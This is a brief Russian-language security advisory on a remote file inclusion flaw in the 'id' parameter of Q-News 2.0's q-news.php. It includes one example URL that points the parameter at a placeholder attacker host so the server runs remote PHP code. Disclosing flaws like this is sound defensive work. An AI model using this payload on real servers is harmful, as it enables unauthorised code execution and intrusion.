Программа: Q-News 2.0, возможно белее ранние версии

Уязвимость позволяет удаленному пользователю выполнить произвольные команды на
целевой системе. Уязвимость обнаружена при обработке входных данных в параметре
"id" сценария "q-news.php". Удаленный пользователь может с помощью специально
сформированного URL выполнить произвольный PHP сценарий на целевой системе с
привилегиями web сервера.

Пример:

http://[target]/path_to_qnews/q-news.php?id=http://[attacker_url]
 

Оставить мнение